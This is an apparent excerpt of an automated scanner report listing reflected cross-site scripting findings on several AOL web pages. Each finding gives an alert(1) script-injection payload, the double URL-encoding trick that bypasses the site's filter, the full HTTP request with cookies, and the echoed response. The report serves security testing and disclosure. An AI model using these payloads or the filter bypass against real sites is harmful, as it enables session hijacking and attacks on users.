<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'iPhoneab98b</script><script>alert(1)</script>0ffb41f2480';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.126. http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/iPad/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce3c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cded6ec663 was submitted in the REST URL parameter 3. This input was echoed as fce3c</script><script>alert(1)</script>5cded6ec663 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone/iPadfce3c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cded6ec663/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617147041-Repeat%7C1367689147041%3B%20s_nrgvo%3DRepeat%7C1367689147043%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:53 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:53 GMT; path=/
Content-Type: text/html
Content-Length: 23643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
eName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone";
   s_265.prop2="iPadfce3c</script><script>alert(1)</script>5cded6ec663";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.127. http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/mail/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25ae3%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6282df73d3 was submitted in the REST URL parameter 2. This input was echoed as 25ae3</script><script>alert(1)</script>6282df73d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone25ae3%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6282df73d3/mail/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617134192-Repeat%7C1367689134192%3B%20s_nrgvo%3DRepeat%7C1367689134194%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:11 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:11 GMT; path=/
Content-Type: text/html
Content-Length: 23687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
xID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone25ae3</script><script>alert(1)</script>6282df73d3";
   s_265.prop2="mail";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');

...[SNIP]...

5.128. http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/mail/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef64a%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43a16951421 was submitted in the REST URL parameter 2. This input was echoed as ef64a</script><script>alert(1)</script>43a16951421 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhoneef64a%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43a16951421/mail/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617134192-Repeat%7C1367689134192%3B%20s_nrgvo%3DRepeat%7C1367689134194%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:27 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:27 GMT; path=/
Content-Type: text/html
Content-Length: 23690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'iPhoneef64a</script><script>alert(1)</script>43a16951421';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.129. http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/mail/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cb1a%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4f4a6fa5a9 was submitted in the REST URL parameter 3. This input was echoed as 4cb1a</script><script>alert(1)</script>b4f4a6fa5a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone/mail4cb1a%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4f4a6fa5a9/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617134192-Repeat%7C1367689134192%3B%20s_nrgvo%3DRepeat%7C1367689134194%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:51 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:51 GMT; path=/
Content-Type: text/html
Content-Length: 23643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
eName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone";
   s_265.prop2="mail4cb1a</script><script>alert(1)</script>b4f4a6fa5a9";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.130. http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/search/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1571e%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ee6dc251a was submitted in the REST URL parameter 2. This input was echoed as 1571e</script><script>alert(1)</script>6ee6dc251a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone1571e%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ee6dc251a/search/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617152782-Repeat%7C1367689152782%3B%20s_nrgvo%3DRepeat%7C1367689152783%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:22 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:22 GMT; path=/
Content-Type: text/html
Content-Length: 23694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
xID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone1571e</script><script>alert(1)</script>6ee6dc251a";
   s_265.prop2="search";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
...[SNIP]...

5.131. http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/search/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3753a%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c48f9faa85 was submitted in the REST URL parameter 2. This input was echoed as 3753a</script><script>alert(1)</script>3c48f9faa85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone3753a%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c48f9faa85/search/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617152782-Repeat%7C1367689152782%3B%20s_nrgvo%3DRepeat%7C1367689152783%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:38 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:38 GMT; path=/
Content-Type: text/html
Content-Length: 23698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'iPhone3753a</script><script>alert(1)</script>3c48f9faa85';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.132. http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/search/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91c42%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c8a5ad593 was submitted in the REST URL parameter 3. This input was echoed as 91c42</script><script>alert(1)</script>7c8a5ad593 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone/search91c42%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c8a5ad593/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617152782-Repeat%7C1367689152782%3B%20s_nrgvo%3DRepeat%7C1367689152783%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:42:03 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:42:03 GMT; path=/
Content-Type: text/html
Content-Length: 23646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
ame="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone";
   s_265.prop2="search91c42</script><script>alert(1)</script>7c8a5ad593";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.133. http://music.aol.com/radioguide/bb [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://music.aol.com
Path:   /radioguide/bb

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6292b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0d1b7f478ce was submitted in the REST URL parameter 2. This input was echoed as 6292b</script><script>alert(1)</script>0d1b7f478ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /radioguide/bb6292b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0d1b7f478ce HTTP/1.1
Host: music.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575004712-Repeat%7C1367647004712%3B%20s_nrgvo%3DRepeat%7C1367647004714%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:05 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:05 GMT; path=/
Content-Type: text/html
Content-Length: 36004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- DATA CALL SPOTS -->
       
...[SNIP]...
<script>
           function runOmni()
           {

               var genre = "bb6292b</script><script>alert(1)</script>0d1b7f478ce";
               
               s_265.channel="us.radiogde";
               
               
               s_265.pfxID="mus";
               s_265.pageName="Genre | "+genre+" Main";
               s_265.server="";
               
               s_265.pageType="";
               s_265.linkInternalF
...[SNIP]...

5.134. http://music.aol.com/radioguide/bb [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://music.aol.com
Path:   /radioguide/bb

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd150"><img%20src%3da%20onerror%3dalert(1)>48bbe472fcd was submitted in the REST URL parameter 2. This input was echoed as bd150"><img src=a onerror=alert(1)>48bbe472fcd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /radioguide/bbbd150"><img%20src%3da%20onerror%3dalert(1)>48bbe472fcd HTTP/1.1
Host: music.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575004712-Repeat%7C1367647004712%3B%20s_nrgvo%3DRepeat%7C1367647004714%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:58 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:56:58 GMT; path=/
Content-Type: text/html
Content-Length: 35942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- DATA CALL SPOTS -->
       
...[SNIP]...
<link rel="canonical" href="http://music.aol.com/radioguide/bbbd150"><img src=a onerror=alert(1)>48bbe472fcd">
...[SNIP]...

5.135. http://my.screenname.aol.com/_cqr/login/checkStatus.psp [cb parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://my.screenname.aol.com
Path:   /_cqr/login/checkStatus.psp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 5b302<a%20b%3dc>7fe70a0ec3a was submitted in the cb parameter. This input was echoed as 5b302<a b=c>7fe70a0ec3a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /_cqr/login/checkStatus.psp?cb=parseCheckStatus5b302<a%20b%3dc>7fe70a0ec3a HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
